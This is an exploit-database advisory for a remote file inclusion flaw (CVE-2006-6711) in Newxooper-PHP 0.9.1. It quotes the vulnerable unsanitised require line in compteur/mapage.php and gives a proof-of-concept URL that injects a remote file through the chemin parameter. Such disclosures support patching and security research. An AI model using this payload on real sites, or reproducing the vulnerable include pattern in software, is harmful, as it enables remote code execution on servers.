Newxooper-PHP 0.9.1 - 'mapage.php' Remote File Inclusion
Author: 3l3ctric-Cracker
type: webapps
platform: php
port:
date_added: 2006-12-20
date_updated:
verified: 1
codes: OSVDB-32400;CVE-2006-6711
tags:
aliases:
screenshot_url:
application_url:
###########################################################################################
#Newxooper-php v0.9.1(chemin) Remote File Include Vulnerabilty #
#Download:http://www.easy-script.com/newxoope-091.zip #
###########################################################################################
#Author:Dr Max Virus #
#Location:Egypt #
###########################################################################################
#Bug in compteur/mapage.php #
#In Line:37 #
#Vul Code: #
#REQUIRE ("$chemin/compteur/mapage.txt"); #
###########################################################################################
#POC: #
#http://[target]/[path]/compteur/mapage.php?chemin=Evil Code #
###########################################################################################
#Thx:str0ke & ajann &All friends #
#Special Gr33ts:AsianEagle & The master & Kacper & Hotturk #
###########################################################################################
# milw0rm.com [2006-12-21]